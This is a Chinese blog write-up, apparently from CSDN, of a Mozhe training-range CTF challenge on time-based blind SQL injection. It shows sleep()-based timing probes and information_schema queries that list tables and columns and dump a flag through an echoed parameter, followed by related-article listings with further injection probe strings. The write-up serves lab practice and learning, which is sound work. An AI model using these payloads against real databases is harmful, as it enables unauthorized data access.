墨者 - SQL注入漏洞测试(时间盲注)

最新推荐文章于 2024-07-31 10:32:16 发布
最新推荐文章于 2024-07-31 10:32:16 发布
阅读量1.3k 收藏
点赞数 2
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/95050363
版权

按照题意,正规思路

flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+ 

通告sleep()函数判断数据长度

然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+ 

用bp字典结合substr函数爆库==>爆表==>爆字段==>爆字段值

可是这注定是个漫长的过程........

但是这条题出现了bug,可以完全不用时间盲注

以下是不用时间盲注

找到注入点,发现1的值会回显

 /flag.php?type=database()'

 

/flag.php?type=group_concat(table_name) from information_schema.tables where table_schema=database()--+

/flag.php?type=group_concat(column_name) from information_schema.columns where table_name='flag'--+

 

/flag.php?type=group_concat(flag) from flag--+

 

 

吃肉唐僧
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[墨者学院]SQL注入漏洞测试(布尔盲注)
m0_60945802的博客
03-22 4214
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者SQL注入漏洞测试(时间盲注)
wswr的博客
03-17 469
思路:我按照题目说的时间盲注试了一下我sleep(),好像没什么反应,然后试了if(1=2,1,sleep(5))好像也没啥反应,然后叭,我就试了一下单引号,发现了注入页面,而且发现了数据和我写入的单引号闭合且执行了,好像我就发现了不用时间注入的方式就能解题,所以本人偷懒了,快速老方法解题。 总结:按道理来说应该掌握时间盲注的注入方式,但其实原理我还是懂的,那既然发现更轻松的方式,就按更轻松的方式解决,当然直接用sqlmap也不是不可以,但是需要知道原理才是这题的目的 原理:暴力猜,库,表,列,值,我感
若依4.7.8版本计划任务rce复现
00勇士王子的博客
06-18 1338
最近项目中发现很多单位都使用了若依二开的系统,而最近若依有个后台计划任务rce的漏洞,比较新,我还没复现过,于是本地搭建一个若依环境复现一下这个漏洞。这个漏洞在4.7.8版本及之前都存在,现在最新版的若依也只更新到了4.7.9版本。
墨者SQL注入漏洞测试(时间盲注)题解
zr1213159840的博客
12-12 1041
解法一:剑走偏锋 首先我们拿到网址后,第一个事就是加上type后测试下 好小子,竟然回显?那我就不客气了 直接看下数据库 爆表 type=group_concat(table_name) from information_schema.tables where table_schema=‘pentesterlab’–+ 爆表中的列,先测试下user type=group_concat(column) from information_schema.columns where table_name=‘f
SQL注入之布尔盲注
最新发布
2201_75572825的博客
07-31 408
注入过程。
墨者学院SQL注入时间盲注
weixin_45819911的博客
07-16 976
墨者学院SQL注入时间盲注)(手动注入+sqlmap+对于注入语句中的那个 ’ 的测试) 闲谈 这样写标题比较醒目,主要是想帮帮像我一样的强迫症的小伙伴,(其实我发现是在线靶场的解题思路啥的看的人多,如果有小伙伴对于我的推测有不同见解的地方可以留言),因为我最近在刷墨者靶场的SQL注入部分,所以遇到自己觉得有意思的题会发出来,小伙白也可以留言告诉我一些有意思的靶场(这是属于小白的进阶之路)。 0x00 注入点判断: 提示很明显,如图0: 图0 提示很明显是参数?type= 画风正常一点的payload
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
sqlilabs第五关布尔盲注(burpsuite版)
xnxqwzy的博客
04-20 853
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
利用野草weedcmsuseragent盲注漏洞拿shell
08-26 746
野草网站管理系统(WEEDCMS)是由野草独立基于PHP+MYSQL开发的内容管理系统。面向企业、个人、小门户等中小规模网站使用而开发的。采用国际上比较流行Smarty引擎和敏捷的JQuery JS框架。 在tools.net上看到有人公布了Weedons的USER_AGENT盲洼漏洞漏洞影响Weedcms的4 0版和最新的WeedCMS v5.O build 20110101...
sql(时间盲注)——墨者学院——漏洞操作记录
chick11的博客
07-16 243
Sql时间盲注 1、 开始的页面,但是不是这个页面,点击下面的任性网页 2、提示再url中传参,加个逗号 ?type=1’ 既然提示是时间盲注,那就 ?type=1’ and sleep(5)%23 没有时间延迟 去掉单引号 有时间延迟5秒 因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap 这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段 import requests import datetime i
渗透测试——sql注入进阶/基于时间盲注/一看就会/
ChenD的学习笔记
10-06 1790
基于时间盲注
墨者学院SQL注入漏洞测试(时间盲注)爆破:
weixin_54105551的博客
06-30 530
本文是关于墨者学院的sql注入时间盲注爆破的过程
渗透测试-SQL注入之布尔盲注时间盲注
lza20001103的博客
04-20 2867
渗透测试-SQL注入之布尔盲注时间盲注
基于时间盲注
热门推荐
weixin_40709439的博客
09-01 1万+
延时注入,用的最多的注入 常用的判断语句: ' and if(1=0,1, sleep(10)) --+  " and if(1=0,1, sleep(10)) --+ ) and if(1=0,1, sleep(10)) --+ ') and if(1=0,1, sleep(10)) --+ ") and if(1=0,1, sleep(10)) --+   写这篇文章只是为了更...
Nginx 防止SQL注入、XSS攻击的实践配置方法
baoba84620的专栏
06-15 2673
   下班的时候,发现博客访问缓慢,甚至出现504错误,通过 top -i 命令查看服务器负载发现负载数值飙升到3.2之多了,并且持续时间越来越频繁直至持续升高的趋势,还以为是被攻击了,对来访IP进行了阈值限制后效果并不是很明显,CDN服务里限制几个主要...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值